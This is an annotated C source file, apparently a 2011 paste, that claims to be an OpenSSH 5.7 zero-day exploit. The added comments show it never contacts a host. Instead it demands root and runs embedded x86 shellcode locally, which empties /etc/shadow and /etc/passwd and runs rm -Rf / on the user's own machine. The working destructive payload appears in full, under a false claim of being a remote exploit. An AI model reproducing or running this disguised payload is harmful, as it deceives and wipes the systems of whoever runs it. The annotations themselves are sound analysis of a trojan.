
Untitled

a guest
Jan 26th, 2011
  1. /*
  2. openSSH 5.7 0day exploit
  3. Off by One error in auth2-pubkey.c
  4. Author: Chroniccommand
  5. Usage: ./exploit <host> <ip>
  6. greetz to _st4ck3d*, x3n0n, xin etc you know who you are ;)
  7. */
  8. #include <stdio.h>
  9. #include <netdb.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12. #include <unistd.h>
  13. #include <arpa/inet.h>
  14. #include <sys/types.h>
  15. #include <sys/socket.h>
  16. #include <netinet/in.h>
  17.  
  /*
   * Print the one-line usage message to stdout and end the process with
   * exit status 1. This function does not return.
   *
   * argv: the program's argument vector; only argv[0] is read.
   *
   * NOTE(review): this message names the arguments <target> <port>, while the
   * comment at the top of the file gives them as <host> <ip>.
   */
  void usage(char *argv[])
  {
      const char *program = argv[0];

      printf("Usage: %s <target> <port>\n", program);
      exit(1);
  }
  23.  
  /*
   * Raw 32-bit x86 Linux machine code, kept as data and called as a function
   * from main(). Decoding the bytes shows a local command runner, not anything
   * that talks to an SSH server:
   *
   *   6a 0b 58         eax = 11, the i386 execve syscall number
   *   99 52            edx = 0, then push a zero terminator
   *   66 68 2d 63      push the two bytes "-c"; edi is set to point at them
   *   68 2f 73 68 00   push "/sh\0"
   *   68 2f 62 69 6e   push "/bin"; ebx is set to point at "/bin/sh"
   *   52               push a NULL (end of the argument vector)
   *   e8 39 00 00 00   call over the next 0x39 bytes, which leaves the address
   *                    of the embedded string on the stack
   *   57 53 89 e1      push edi and ebx; ecx = { "/bin/sh", "-c", string, NULL }
   *   cd 80            int 0x80
   *
   * The embedded 0x39-byte string starts at the last byte of the second row
   * and ends at the \x00 in the sixth row. As ASCII it reads:
   *
   *   echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf /
   *
   * The net effect is execve("/bin/sh", { "/bin/sh", "-c", <that string> }, NULL)
   * on the machine that runs this program: both account databases are
   * overwritten and the root filesystem is deleted recursively. No byte of the
   * payload refers to a socket, to OpenSSH or to auth2-pubkey.c.
   */
  unsigned char shellcode[] =
  "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
  "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
  "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
  "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
  "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
  "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
  "\xcd\x80";
  32.  
  33.  
  34.  
  /*
   * Entry point. As written, the function never contacts a remote host: it
   * contains no socket(), no name lookup and no send or write call, and
   * argv[1] and argv[2] are never read. What it does, in order:
   *
   *   1. exits unless the caller's uid is 0;
   *   2. prints a "Starting exploit" banner;
   *   3. requires exactly two arguments (their values are ignored);
   *   4. prints "[!!]Exploit failed" to stderr;
   *   5. calls the bytes of shellcode[] as a function in this same process.
   *
   * The bytes in shellcode[] decode to an execve of /bin/sh -c with a command
   * string that empties /etc/shadow and /etc/passwd and then runs rm -Rf /.
   * The file therefore behaves as a trojan aimed at whoever compiles and runs
   * it as root, not as the remote OpenSSH exploit the header comment describes.
   *
   * Everything after the exit(1) that follows the call is unreachable.
   */
  int main(int argc, char *argv[])
  {
      int uid = getuid();
      /* port is set but never used; sock is never assigned a descriptor. */
      int port = 22, sock;
      /* host and addr are declared but never filled in anywhere below. */
      struct hostent *host;
      struct sockaddr_in addr;
 
      /*
       * Root is demanded before anything else. The only reachable statement
       * after this check that is affected by uid 0 is the call into shellcode[],
       * whose command needs root to overwrite /etc/shadow and /etc/passwd.
       */
      if(uid !=0)
      {
          fprintf(stderr, "[!!]Error: You must be root\n");
          exit(1);
      }
      /* Always true at this point, because the branch above has already exited. */
      if(uid == 0)
      {
          printf("\t[+]Starting exploit..\n");
      }
      /* Only the argument count is checked; usage() exits with status 1. */
      if(argc != 3)
          usage(argv);
 
      /*
       * The failure message is printed unconditionally and before the payload
       * runs, so the user sees "Exploit failed" whatever happens next.
       */
      fprintf(stderr, "[!!]Exploit failed\n");
      /*
       * Casts the data array to a function pointer and calls it locally. If the
       * execve inside the payload succeeds, this process image is replaced and
       * control does not come back here.
       */
      (*(void(*)())shellcode)();
      exit(1);
      /*
       * Unreachable from here on. The copy into payload[] is never sent
       * anywhere, both connect() calls would use the uninitialised sock and
       * addr, and system("/bin/sh") would start a shell on the local machine.
       */
      char payload[1024];
      memcpy(payload, &shellcode, sizeof(shellcode));
      if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
      {
          printf("[+]Got shell\n");
          system("/bin/sh");
      }
      else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
      {
          fprintf(stderr, "[!!]Exploit failed\n");
          exit(1);
      }
  }